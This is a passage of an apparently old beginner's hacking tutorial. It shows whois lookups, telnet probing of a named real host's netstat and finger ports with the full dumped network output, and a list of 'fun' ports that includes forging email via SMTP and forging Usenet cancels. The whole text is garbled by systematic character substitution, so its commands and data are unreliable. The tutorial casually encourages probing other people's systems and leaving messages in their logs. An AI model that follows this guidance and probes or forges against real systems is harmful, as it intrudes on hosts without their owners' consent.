))))))))))))))))))))))))))))) "ewbie "ote 9 %: * domain is an 1nternet address& ;ou can use it to look u. who runs the com.uters used by the domain( and also to look u. how that domain is connected to the rest of the 1nternet& ))))))))))))))))))))))))))))) So to do this we first logged into my shell account with Southwest /yber.ort& 1 ga<e the command: ^slugV YEEZ ?Vwhois nmia&com "ew 6e'ico 1nternet *ccess !"61*?246$ --M, Buena Cista S3 *lbu@uer@ue( "6 DK,ME 2omain "ame: "61*&/46 *dministrati<e /ontact( #echnical /ontact( Qone /ontact: 4rrell( Stan !S4,,$ S*4J"61*&/46 !5M5$ DKK?ME,K 5ecord last u.dated on ,,?6ar?9G& 5ecord created on ,,?6ar?9G& 2omain ser<ers in listed order: "S&"61*&/46 G5*"23&"6&45G ,9D&59&,EE&,M ,-9&,-,&,&-

"ow itbs a good bet that grande&nm&org is ser<ing a lot of other 1nternet hosts beside nmia&com& Herebs how we .ort surf our way to find this out: ^slugV YEKZ ?Vtelnet grande&nm&org ,5 #rying ,-9&,-,&,&- &&& /onnected to grande&nm&org& 3sca.e character is 'BZ'& #GC 6ulti"et C%&5 5e< B( C*U GMMM?GMM( 4.enC6S C*U CE&, +roduct ?????????? 607#1"3# 7icense *uthori>ation 3'.iration 2ate ??????? ????????????? ??????????????? ;es *?,%K?,EG, !none$

"HS?/713"#

;es

*?,%K?,,%-%K

!none$

))) /onfiguration for file :607#1"3#:"3#W458F23C1/3S&/4"H1G05*#14": ))) 2e<ice ?????? seM *da.ter ??????? /S5 *ddress HlagsICector

???????????

???????????? ?"4"3? ?"4"3?

!Shared C6S 3thernetIH221$

?"4"3?

6ulti"et *cti<e /onnections( including ser<ers: +roto 5c<?S Snd?S 7ocal *ddress !+ort$ Horeign *ddress !+ort$ State ????? ????? ????? ?????????????????? ?????????????????? ????? #/+ M D-- G5*"23&"6&45G!"3#S#*#$ ,9D&59&,,5&-G!,5E9$ 3S#*B71SH32 #/+ M M G5*"23&"6&45G!+4+%$ ,EG&EG&-M,&EK!,-5E$ 3S#*B71SH32 #/+ M M G5*"23&"6&45G!G9,D$ ,-9&,-,&-5G&5!#37"3#$ 3S#*B71SH32 #/+ M M G5*"23&"6&45G!#37"3#$ *C*#*5&"6&45G!%,G,$ 3S#*B71SH32 #/+ M M )!"*63S35C1/3$ )!)$ 71S#3" #/+ M M )!#37"3#$ )!)$ 71S#3" #/+ M M )!H#+$ )!)$ 71S#3" #/+ M M )!H1"G35$ )!)$ 71S#3" #/+ M M )!"3#S#*#$ )!)$ 71S#3" #/+ M M )!S6#+$ )!)$ 71S#3" #/+ M M )!74G1"$ )!)$ 71S#3" #/+ M M )!SH377$ )!)$ 71S#3" #/+ M M )!3U3/$ )!)$ 71S#3" #/+ M M )!5+/$ )!)$ 71S#3" #/+ M M )!"3#/4"#547$ )!)$ 71S#3" #/+ M M )!S;S#*#$ )!)$ 71S#3" #/+ M M )!/H*5G3"$ )!)$ 71S#3" #/+ M M )!2*;#163$ )!)$ 71S#3" #/+ M M )!#163$ )!)$ 71S#3" #/+ M M )!3/H4$ )!)$ 71S#3" #/+ M M )!21S/*52$ )!)$ 71S#3" #/+ M M )!+51"#35$ )!)$ 71S#3"

#/+ M M )!+4+-$ )!)$ 71S#3" #/+ M M )!+4+%$ )!)$ 71S#3" #/+ M M )!835B354SF6*S#35$ )!)$ 71S#3" #/+ M M )!874G1"$ )!)$ 71S#3" #/+ M M )!8SH377$ )!)$ 71S#3" #/+ M M G5*"23&"6&45G!G,KG$ 4S4&"6&45G!U,,$ 3S#*B71SH32 #/+ M M G5*"23&"6&45G!G,K-$ 4S4&"6&45G!U,,$ 3S#*B71SH32 #/+ M M G5*"23&"6&45G!G,K,$ 4S4&"6&45G!U,,$ 3S#*B71SH32 #/+ M M )!HS$ )!)$ 71S#3" 02+ M M )!"*63S35C1/3$ )!)$ 02+ M M ,-K&M&M&,!"*63S35C1/3$ )!)$ 02+ M M G5*"23&"6&45!"*63S35C$ )!)$ 02+ M M )!#H#+$ )!)$ 02+ M M )!B44#+S$ )!)$ 02+ M M )!835B354S$ )!)$ 02+ M M ,-K&M&M&,!835B354S$ )!)$ 02+ M M G5*"23&"6&45!835B354S$ )!)$ 02+ M M )!)$ )!)$ 02+ M M )!S"6+$ )!)$ 02+ M M )!5+/$ )!)$ 02+ M M )!2*;#163$ )!)$ 02+ M M )!3/H4$ )!)$ 02+ M M )!21S/*52$ )!)$ 02+ M M )!#163$ )!)$ 02+ M M )!/H*5G3"$ )!)$ 02+ M M )!#*78$ )!)$ 02+ M M )!"#*78$ )!)$ 02+ M M )!,M-%$ )!)$ 02+ M M )!U26/+$ )!)$ 6ulti"et registered 5+/ .rograms: +rogram Cersion +rotocol +ort ??????? ??????? ???????? ???? +45#6*+ #/+ ,,, +45#6*+ 02+ ,,, 6ulti"et 1+ 5outing tables:

2estination Gateway Hlags 5efcnt 0se 1nterface 6#0 ?????????? ?????????? ????? ?????? ????? ????????? ???? ,9D&59&,EK&, 7*W511&"6&45G 0.(Gateway(H M seM ,5MM ,EE&G5&M&, 3"SS%E5&"6&45G 0.(Gateway(H M G,E- seM ,5MM -M5&,%D&,%D&, 3"SS%E5&"6&45G 0.(Gateway(H M K, seM ,5MM -MG&,-K&,EM&, 3"SS%E5&"6&45G 0.(Gateway(H M -9D seM ,5MM ,-K&M&M&, ,-K&M&M&, 0.(Host 5 ,,D%5,% loM G,%E ,9D&59&,EK&- 7*W511&"6&45G 0.(Gateway(H M EGM seM ,5MM ,9-&,%-&D9&- 3"SS%E5&"6&45G 0.(Gateway(H M K-9 seM ,5MM -MK&KK&5E&3"SS%E5&"6&45G 0.(Gateway(H M 5 seM ,5MM -MG&9K&-,%&- 3"SS%E5&"6&45G 0.(Gateway(H M -EG, seM ,5MM ,9G&9M&KG&EE 3"SS%E5&"6&45G 0.(Gateway(H M , seM ,5MM -MG&-5-&,M-&- 3"SS%E5&"6&45G 0.(Gateway(H M ,M9 seM ,5MM -M5&,EM&-G%&- 3"SS%E5&"6&45G 0.(Gateway(H M KD seM ,5MM -M-&-,%&G&3"SS%E5&"6&45G 0.(Gateway(H M G seM ,5MM -M-&-,E&--G&EE 3"SS%E5&"6&45G 0.(Gateway(H M ,,% seM ,5MM ,9-&,%-&D9&% 3"SS%E5&"6&45G 0.(Gateway(H M ,,MM seM ,5MM ,9D&-M%&,9E&EK 3"SS%E5&"6&45G 0.(Gateway(H M %D5 seM ,5MM ,EM&-M5&,%&% 3"SS%E5&"6&45G 0.(Gateway(H M KD seM ,5MM -M-&-GK&,MK&,%, 3"SS%E5&"6&45G 0.(Gateway(H M ,9 seM ,5MM ,9D&59&,EK&G 7*W511&"6&45G 0.(Gateway(H M DseM ,5MM ,-D&,GD&,5K&E 3"SS%E5&"6&45G 0.(Gateway(H M ,9D seM ,5MM

,EM&G5&,M&E 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM ,-D&,-,&5M&K 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM -ME&,KM&,,%&D 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM ,-D&,GD&,-D&9 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM -M%&K&,%-&9 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM -MG&-,E&5K&,M 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM ,%M&KG&,&K5 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM -ME&ED&E5&,5 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM ,-9&-,9&,%&D, 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM -MG&-55&-GE&,D 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM ,EM&G5&-G&-, 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM -ME&-D&,ED&-, 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM ,E%&,K9&%&--- 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM ,9D&,M9&,%M&%% 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM ,99&--G&,MD&%% 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM -M%&K&,%-&9D 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM ,9D&,,,&-5%&%5 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM -ME&,G9&-G&,MM 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM ,E5&-,-&,M5&,ME 3"SS%E5&"6&45G 0.(Gateway(H M ,MME -M5&-%D&%&-G, 3"SS%E5&"6&45G 0.(Gateway(H M ,5MM

% %M5,G5, ,,-,G ,DM ,M,,K -G9 5GK

seM seM seM seM seM seM seM seM seM seM seM seM seM seM seM

,,-5 9K -M9% %,5 ,D-5 ,,%EK% ,,%G %%9K ,K E9

seM seM seM seM seM

,9D&G9&GG&-G- 3"SS%E5&"6&45G 0.(Gateway(H M -5 seM ,5MM ,9G&--&,DD&-G- 3"SS%E5&"6&45G 0.(Gateway(H M -M seM ,5MM ,EG&EG&M 7*W511&"6&45G 0.(Gateway , GM%KK seM ,5MM M&M&M 3"SS%E5&"6&45G 0.(Gateway GK-DKG, seM ,5MM -MK&EE&, G745;&"6&45G 0.(Gateway M 5, seM ,5MM -M5&,EE&, G745;&"6&45G 0.(Gateway M ,9KD seM ,5MM -MG&,%G&, 7*W511&"6&45G 0.(Gateway M 5G seM ,5MM -MG&,%G&G745;&"6&45G 0.(Gateway M ,%D seM ,5MM ,9-&,%-&,-9&,-,&-GD&, 0.(Gateway M E%G5 seM ,5MM -MG&,%G&EK G745;&"6&45G 0.(Gateway M -M-- seM ,5MM -ME&-ME&EK G745;&"6&45G 0.(Gateway M KKKD seM ,5MM -ME&-ME&ED 7*W511&"6&45G 0.(Gateway M %,D5 seM ,5MM -MK&EE&5 G745;&"6&45G 0.(Gateway M E-E seM ,5MM -MG&,%G&E9 G745;&"6&45G 0.(Gateway M K99M seM ,5MM -MK&EE&E G745;&"6&45G 0.(Gateway M 5% seM ,5MM -MG&,%G&KM 7*W511&"6&45G 0.(Gateway M ,DM,, seM ,5MM ,9-&,DD&,%5 G745;&"6&45G 0.(Gateway M 5 seM ,5MM -ME&-ME&K, 7*W511&"6&45G 0.(Gateway M seM ,5MM -MG&,%G&K G745;&"6&45G 0.(Gateway M %D seM ,5MM ,99&D9&,%5 G745;&"6&45G 0.(Gateway M 99 seM ,5MM ,9D&59&,%E 7*W511&"6&45G 0.(Gateway M ,-9% seM ,5MM -MG&,%G&9 G745;&"6&45G 0.(Gateway M -, seM ,5MM -MG&,%G&K% G745;&"6&45G 0.(Gateway M 59K9G seM ,5MM ,-9&,%D&M G745;&"6&45G 0.(Gateway M 5-E- seM ,5MM

,9-&9-&,M 7*W511&"6&45G ,5MM -ME&-ME&K5 7*W511&"6&45G ,5MM -MK&EE&,% G745;&"6&45G ,5MM -MG&,%G&KK 7*W511&"6&45G ,5MM -MK&EE&,G G745;&"6&45G ,5MM -MG&,%G&KD G745;&"6&45G ,5MM -MG&5-&-MK G745;&"6&45G ,5MM -MG&,%G&K9 G745;&"6&45G ,5MM ,9-&,EM&,GG 7*W511&"6&45G ,5MM -ME&-ME&DM +3"";&"6&45G ,5MM -MG&,%G&DM G745;&"6&45G ,5MM ,9D&99&-M9 7*W511&"6&45G ,5MM -MK&EE&,K G745;&"6&45G ,5MM -MG&,%G&DG745;&"6&45G ,5MM ,9-&G,&-,, G745;&"6&45G ,5MM ,9-&,D9&,GK 7*W511&"6&45G ,5MM -MG&,%G&DG +3"";&"6&45G ,5MM -MG&,%G&DK 7*W511&"6&45G ,5MM ,GE&DD&M G745;&"6&45G ,9-&DG&-G G745;&"6&45G ,5MM -MG&,%G&DD 7*W511&"6&45G ,5MM

0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M

,E% EMG ,,DG %EG9 %%G -%9 -9% ,-9G ,,K GEE% 9, ,,%E -G,K% -9KEE ,55 %,%% ,D9 9G

seM seM seM seM seM seM seM seM seM seM seM seM seM seM seM seM seM seM ,5MM

,GM seM %5%M seM ,%E seM

,9D&G9&-,K ,5MM ,9-&,%-&D9 ,5MM ,9D&,KE&-,9 ,5MM -ME&-ME&9,5MM ,9-&-%G&--M -MG&,%G&9,5MM ,9D&59&,5K ,5MM -ME&-ME&9% ,5MM -MG&,%G&9% ,5MM ,9D&59&,5D ,5MM ,9D&59&,59 ,5MM -MG&,%G&95 ,5MM -ME&-ME&9E ,5MM -ME&-ME&,E, ,5MM ,9D&59&9K ,9D&59&,E, ,5MM ,9-&-MK&--E ,5MM ,9D&59&99 ,9D&59&,E% ,5MM ,9-&,%%&,MM ,5MM -MG&,%G&,MM ,5MM ,-D&,E5&M ,5MM

G745;&"6&45G G745;&"6&45G G745;&"6&45G 7*W511&"6&45G

0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M

%M% %5,% ,-KD ,--D

seM seM seM seM

,-9&,-,&,&9, 0.(Gateway M -%%K seM ,5MM 7*W511&"6&45G 0.(Gateway M ,%995 seM 7*W511&"6&45G G745;&"6&45G G745;&"6&45G 7*W511&"6&45G 7*W511&"6&45G +3"";&"6&45G G745;&"6&45G 7*W511&"6&45G 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 5MD E%5 9MK ,G-,G ,DME %EGG 99M 5-D 55 G9K seM seM seM seM seM seM seM seM seM seM seM ,5MM ,5MM

+3"";&"6&45G 0.(Gateway M 7*W511&"6&45G 0.(Gateway M G745;&"6&45G 0.(Gateway M

9%-,K

+3"";&"6&45G 0.(Gateway M G745;&"6&45G 0.(Gateway M 7*W511&"6&45G G745;&"6&45G +3"";&"6&45G 0.(Gateway M 0.(Gateway M 0.(Gateway M

seM %%K9 seM %EG9 D ,5D5, seM seM seM

,9D&59&,E5 ,5MM -ME&-ME&,E5 ,5MM -ME&-ME&,M,5MM ,EM&-%M&M ,5MM -ME&-ME&,EE ,5MM -M5&,EE&-%, ,5MM ,9D&59&,EK ,5MM -ME&-ME&,M% ,5MM ,9D&59&,ED ,5MM -ME&-ME&,MG ,5MM -ME&-ME&,ED ,5MM -MG&,%G&,M5 ,5MM -ME&-ME&,M5 ,5MM -MG&,%G&G, ,5MM -ME&-ME&,E9 ,5MM -MG&,%G&G,5MM -ME&-ME&,KM ,5MM ,9D&G9&GG ,9D&59&,MD ,5MM -MG&-9&-%E ,5MM -ME&-ME&,K,5MM

G745;&"6&45G 7*W511&"6&45G G745;&"6&45G 7*W511&"6&45G 7*W511&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G 7*W511&"6&45G 7*W511&"6&45G 7*W511&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G

0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M

-KG ,EK 5%,E ,9GMD ,K5E %-G ,5ED %E-9 9ME% K%%% -%G GD-E G-G,KD5,M, ,MKE, 9,E

seM seM seM seM seM seM seM seM seM seM seM seM seM seM seM seM seM ,5MM

% seM -,-9 seM ,-5 5D%9 seM seM

-MG&,%G&,MD ,5MM -ME&-ME&,K% ,5MM ,9D&,K5&,K% ,5MM ,9D&59&,,M ,5MM ,9D&5,&-%D ,5MM ,9-&,%E&,,M ,5MM -MG&,%G&GD ,5MM ,9D&,K5&,KE ,5MM -ME&-ME&,,G ,5MM -ME&-ME&,K9 ,5MM ,9D&59&,K9 ,5MM ,9D&59&,,5 ,5MM -ME&-ME&,D, ,5MM -ME&-ME&,D,5MM -ME&-ME&,,D ,5MM -ME&-ME&,,9 ,5MM -ME&-ME&,D% ,5MM ,G%&,-M&M ,5MM -ME&-ME&,DG ,5MM -M5&,EK&,-M ,5MM

G745;&"6&45G G745;&"6&45G 7*W511&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G 7*W511&"6&45G 7*W511&"6&45G 7*W511&"6&45G +3"";&"6&45G G745;&"6&45G G745;&"6&45G S13""*&"6&45G G745;&"6&45G G745;&"6&45G S13""*&"6&45G 7*W511&"6&45G G745;&"6&45G G745;&"6&45G

0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway , 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M

%-,E %KG E--K ,K9K ,%5E 5D% G%GG ,G ---

seM seM seM seM seM seM seM seM seM seM seM

,%-DDE seM ,%5G ,E %G-% -D-GK% seM seM seM seM seM

,-%5%% seM ,,,G G-MseM seM

-ME&-ME&,-, ,5MM ,-9&,-,&M ,5MM -MG&,%G&,-,5MM -MG&,%G&5D ,5MM ,-D&,-%&M ,5MM -MG&,%G&59 ,5MM -MG&,%G&,-G ,5MM -ME&-ME&,-G ,5MM -ME&-ME&,-5 ,5MM -MG&,%G&,-E ,5MM -ME&-ME&,-E ,5MM -MG&E9&,9M ,5MM -ME&-ME&,9M ,5MM -MG&,%G&,-K ,5MM -ME&-ME&,9, ,5MM

G745;&"6&45G G5*"23&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G 7*W511&"6&45G +3"";&"6&45G G745;&"6&45G 7*W511&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G G745;&"6&45G

0.(Gateway , 0. ,-

K,

seM

-,E5D599 seM ,95 KKMK %GG,E ,MMK %K,EM K9 seM seM seM seM seM seM

0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M 0.(Gateway M

-%%%59 seM G9K ,%EGG GM59 ,E%M G5E-, %5KG seM seM seM seM seM seM

6ulti"et 1+U 5outing tables: 2estination Gateway Hlags 5efcnt 0se 1nterface 6#0 ?????????? ?????????? ????? ?????? ????? ????????? ???? 6ulti"et *5+ table: Host "etwork *ddress ???????????????????????????????????????????? G745;&"6&45G !1+ ,-9&,-,&,&G$ #em.orary 3thernet *ddress *r. Hlags ???????????????? ????????? **:MM:MG:MM:E,:2M

Y0"8"4W"Z !1+ ,-9&,-,&-5,&,$ #em.orary "*5*"R4&"6&45G !1+ ,-9&,-,&,&5E$ #em.orary /H*6*&"6&45G !1+ ,-9&,-,&,&D$ #em.orary Y0"8"4W"Z !1+ ,-9&,-,&-5,&5$ #em.orary 7*W511&"6&45G !1+ ,-9&,-,&-5G&,M$ #em.orary Y0"8"4W"Z !1+ ,-9&,-,&,&9,$ #em.orary B5*C4&"6&45G !1+ ,-9&,-,&,&E$ #em.orary +3"";&"6&45G !1+ ,-9&,-,&,&,M$ #em.orary *551B*&"6&45G !1+ ,-9&,-,&,&,G$ #em.orary *Q07&"6&45G !1+ ,-9&,-,&,&5,$ #em.orary 3"SS%E5&"6&45G !1+ ,-9&,-,&,&%$ #em.orary *C*#*5&"6&45G !1+ ,-9&,-,&-5G&,$ #em.orary Y0"8"4W"Z !1+ ,-9&,-,&-5%&-$ #em.orary Y0"8"4W"Z !1+ ,-9&,-,&-5G&5$ #em.orary /4"/H*S&"6&45G !1+ ,-9&,-,&,&,,$ #em.orary Y0"8"4W"Z !1+ ,-9&,-,&-5%&,M$ #em.orary

MM:/M:M5:M,:-/:2MD:MM:DK:MG:9H:G**:MM:MG:MM:M/:2M **:MM:MG:MM:2-:2M **:MM:MG:MM:5/:2M MM:/M:M5:M,:-/:2**:MM:MG:MM:MB:2M **:MM:MG:MM:5H:2M MD:MM:-B:B/:/,:*K MD:MM:DK:MM:*,:2% MM:MM:M/:5,:3H:5D MD:MM:5*:,2:5-:M2 MD:MM:5*:GK:G*:,2 MM:/M:KB:5H:5H:DM MD:MM:5*:GK:G*:,2 **:MM:MG:MM:GB:2M

6ulti"et "etwork 1nterface statistics: "ame 6tu "etwork *ddress 1.kts 1errs 4.kts 4errs /ollis ???? ??? ??????? ?????????????? ????? ????? ????? ????? ?????? seM ,5MM ,-9&,-,&M G5*"23&"6&45G EDG--9GD M 5%G9-D%% , M loM G,%E ,-K&M&M ,-K&M&M&, ,,DD,9, M ,,DD,9, M M

6ulti"et +rotocol statistics: E5-EG,K% 1+ .ackets recei<ed -- 1+ .ackets smaller than minimum si>e E9-D 1+ fragments recei<ed G 1+ fragments timed out %G 1+ recei<ed for unreachable destinations KMG,GM 1/6+ error .ackets generated 9EEK 1/6+ o.codes out of range G,KM Bad 1/6+ .acket checksums K%G%E% 1/6+ res.onses K%G%E% 1/6+ :3cho: .ackets recei<ed K%G%E% 1/6+ :3cho 5e.ly: .ackets sent ,D%%9 1/6+ :3cho 5e.ly: .ackets recei<ed KMG,GM 1/6+ :2estination 0nreachable: .ackets sent G5,-G% 1/6+ :2estination 0nreachable: .ackets recei<ed ,GDD 1/6+ :Source Suench: .ackets recei<ed ,E%9,, 1/6+ :5e2irect: .ackets recei<ed ,D9K%- 1/6+ :#ime 3'ceeded: .ackets recei<ed ,-E9EE #/+ connections initiated -%%99D #/+ connections established ,%-E,, #/+ connections acce.ted EK9K- #/+ connections dro..ed -D,D- embryonic #/+ connections dro..ed -E9%99 #/+ connections closed ,MK,,D%D #/+ segments timed for 5## ,M5M5,GM #/+ segments u.dated 5## %9-K-EG #/+ delayed */8s sent EEE #/+ connections dro..ed due to retransmit timeouts ,,,MGM #/+ retransmit timeouts %,%E #/+ .ersist timeouts 9 #/+ .ersist connection dro.s ,ED5M #/+ kee.ali<e timeouts ,,95 #/+ kee.ali<e .robes sent ,G%9- #/+ connections dro..ed due to kee.ali<e timeouts -DDG-EE% #/+ .ackets sent ,-K,GGDG #/+ data .ackets sent ,-MEMEMMDE #/+ data bytes sent 5D%-, #/+ data .ackets retransmitted --,GGM%E #/+ data bytes retransmitted EDM-,99 #/+ */8?only .ackets sent ,5M- #/+ window .robes sent

GD% #/+ 05G?only .ackets sent D9ME,K5 #/+ Window?0.date?only .ackets sent %595M9 #/+ control .ackets sent %DEK5MDG #/+ .ackets recei<ed -D%99%E% #/+ .ackets recei<ed in se@uence ,9-9G,D%DE #/+ bytes recei<ed in se@uence -5-MK #/+ .ackets with checksum errors -K%%KG #/+ .ackets were du.licates -%M5-5KMD #/+ bytes were du.licates %KGD #/+ .ackets had some du.licate bytes G9%-,G #/+ bytes were .artial du.licates -%,K,5E #/+ .ackets were out of order %,5,-MGEK- #/+ bytes were out of order ,9,5 #/+ .ackets had data after window DE5GG% #/+ bytes were after window 5DMG #/+ .ackets for already closed connection 9G, #/+ .ackets were window .robes ,MDGKG59 #/+ .ackets had */8s ---E5K #/+ .ackets had du.licate */8s , #/+ .acket */8ed unsent data ,-MM-KGK%9 #/+ bytes */8ed ,G,5G5 #/+ .ackets had window u.dates ,% #/+ segments dro..ed due to +*WS GE5D,5D #/+ segments were .redicted .ure?*/8s -GM%%K5E #/+ segments were .redicted .ure?data DMDK9DM #/+ +/B cache misses %M5 Bad 02+ header checksums ,K Bad 02+ data length fields -%KK--K- 02+ +/B cache misses 6ulti"et Buffer Statistics: %DD out of EMD buffers in use: %M buffers allocated to 2ata& ,M buffers allocated to +acket Headers& EE buffers allocated to Socket Structures& 5K buffers allocated to +rotocol /ontrol Blocks& ,E% buffers allocated to 5outing #able 3ntries& - buffers allocated to Socket "ames and *ddresses& GD buffers allocated to 8ernel Hork?+rocesses& - buffers allocated to 1nterface *ddresses& , buffer allocated to 6ulticast *ddresses&

, buffer allocated to #imeout /allbacks& E buffers allocated to 6emory 6anagement& - buffers allocated to "etwork ##; /ontrol Blocks& ,, out of G% .age clusters in use& ,, /UBs borrowed from C6S de<ice dri<ers - /UBs waiting to return to the C6S de<ice dri<ers ,E- 8bytes allocated to 6ulti"et buffers !GGP in use$& --E 8bytes of allocated buffer address s.ace !MP of ma'imum$& /onnection closed by foreign host& ^slugV YEDZ ?V Whoa What was all that? What we did was telnet to .ort ,5 ?? the netstat .ort?? which on some com.uters runs a daemon that tells anybody who cares to dro. in =ust about e<erything about the connection made by all the com.uters linked to the 1nternet through this com.uter& So from this we learned two things: ,$ Grande&nm&org is a <ery busy and im.ortant com.uter& -$ 3<en a <ery busy and im.ortant com.uter can let the random .ort surfer come and .lay& So my lady friend wanted to try out another .ort& 1 suggested the finger .ort( number K9& So she ga<e the command: ^slugV YEDZ ?Vtelnet grande&nm&org K9 #rying ,-9&,-,&,&- &&& /onnected to grande&nm&org& 3sca.e character is 'BZ'& finger ?Sorry( could not find :H1"G35: /onnection closed by foreign host& ^slugV YE9Z ?Vtelnet grande&nm&org K9 #rying ,-9&,-,&,&- &&& /onnected to grande&nm&org& 3sca.e character is 'BZ'& hel. ?Sorry( could not find :H37+:

/onnection closed by foreign host& ^slugV YE9Z ?Vtelnet grande&nm&org K9 #rying ,-9&,-,&,&- &&& /onnected to grande&nm&org& 3sca.e character is 'BZ'& ? ?Sorry( could not find :?: /onnection closed by foreign host& ^slugV YE9Z ?Vtelnet grande&nm&org K9 #rying ,-9&,-,&,&- &&& /onnected to grande&nm&org& 3sca.e character is 'BZ'& man ?Sorry( could not find :6*": /onnection closed by foreign host& ^slugV YE9Z ?V *t first this looks like =ust a bunch of failed commands& But actually this is .retty fascinating& #he reason is that .ort K9 is( under 13#H rules( su..osed to run fingerd( the finger daemon& So when she ga<e the command `fingera and grande&nm&org said ?Sorry( could not find :H1"G35(a we knew this .ort was not following 13#H rules& "ow on may com.uters they donbt run the finger daemon at all& #his is because finger has so .ro.erties that can be used to gain total control of the com.uter that runs it& But if finger is shut down( and nothing else is running on .ort K9( we woudl get the answer: telnet: connect: /onnection refused& But instead we got connected and grande&nm&org was waiting for a command& "ow the normal thing a .ort surfer does when running an unfmiliar daemon is to coa' it into re<ealing what commands it uses& `Hel.(a `?a and `mana often work& But it didnbt hel. us& But e<en though these commands didnbt hel. us( they did tell us that the daemon is .robably something sensiti<e& 1f it were a daemon that was meant for anybody and his brother to use( it would ha<e gi<en us instructions&

So what did we do ne't? We decided to be good 1nternet citi>ens and also stay out of =ail We decided webd beter log off& But there was one hack we decided to do first: lea<e our mark on the shell log file& #he shell log file kee.s a record of all o.erating system commands made on a com.uter& #he adminsitrator of an ob<iously im.ortant com.uter such as grande&nm&org is .robably com.etent enough to scan the records of what commands are gi<en by whom to his com.uter& 3s.ecially on a .ort im.ortant enough to be running a mystery( non?13#H daemon& So e<erything we ty.es while connected was sa<ed on a log& So my friend giggled with glee and left a few messages on .ort K9 before logging off& 4h( dear( 1 do belie<e shebs hooked on hacking& Hmmm( it could be a good way to meet cute sysadmins&&& So( .ort surfbs u. 1f you want to surf( herebs the basics: ,$ Get logged on to a shell account& #hatbs an account with your 1S+ that lets you gi<e 0ni' commands& 4r ?? run 7inu' or some other kind of 0ni' on your +/ and hook u. to the 1nternet& -$ Gi<e the command `telnet ^hostnameV ^.ot numberV` where ^hostnameV is the internet address of the com.uter you wnat to <isit and ^.ort numberV is whate<er looks .hun to you& %$ 1f you get the res.onse `connected to ^hostnameV(a then surfbs u. Hollowing are some of my fa<orite .orts& 1t is legal and harmless to .ay them <isits so long as you donbt figure out how to gain su.eruser status while .laying with them& Howe<er( .lease note that if you do too much .ort surfing from your shell account( your sysadmin may notice this in his or her shell log file& 1f he or she is .re=udiced against hacking ( you may get kicked off your 1S+& So you may want to e'.lain in ad<ance that you are merely a harmless hacker looking to ha<e a good time( er( um( learn about 0ni'& ;eh( that sounds good&&& +ort number Ser<ice Why itbs .hun

K echo Whate<er you ty.e in( the host re.eats back to 9 discard 2e<Inull ?? how fast can you figure out this ,, systat 7ots of info on users ,% daytime #ime and date at com.uterbs location

you( used for .ing one?

,5 netstat #remendous info on networks but rarely used any ,9 chargen +ours out a stream of *S/11 characters& 0se B/ -, ft. #ransfers files -- ssh secure shell login ?? encry.ted tunnel -% telnet Where you log in if you donbt use ssh:$ -5 sm.t Horge email from Bill&GatesJ6icrosoft&org& %K time #ime %9 rl. 5esource location G% whois 1nfo on hosts and networks 5% domain "ameser<er KM go.her 4ut?of?date info hunter K9 finger 7ots of info on users DM htt. Web ser<er ,,M .o. 1ncoming email ,,9 nnt. 0senet news grou.s ?? forge .osts( cancels GG% shtt. *nother web ser<er 5,- biff 6ail notification

more to sto.&

5,% rlogin 5emote login who 5emote who and u.time 5,G shell 5emote command( no .assword used syslog 5emote system logging ?? how we bust hackers 5-M route 5outing information .rotocol )))))))))))))))))))))))))) +ro.eller head ti.: "ote that in most cases an 1nternet host will use these .ort number assignments for these ser<ices& 6ore than one ser<ice may also be assigned simultaneously to the same .ort& #his numbering system is <oluntarily offered by the 1nternet 3ngineering #ask Horce !13#H$& #hat means that an 1nternet host may use other .orts for these ser<ices& 3'.ect the une'.ected 1f you ha<e a co.y of 7inu'( you can get the list of all the 13#H assignments of .ort numbers in the file IetcIser<ices& /ontents of Colume %: How to .rotect yourself from email bombs How to ma. the 1nternet& How to kee. from getting kicked off 15/ How to 5ead 3mail Headers and Hind 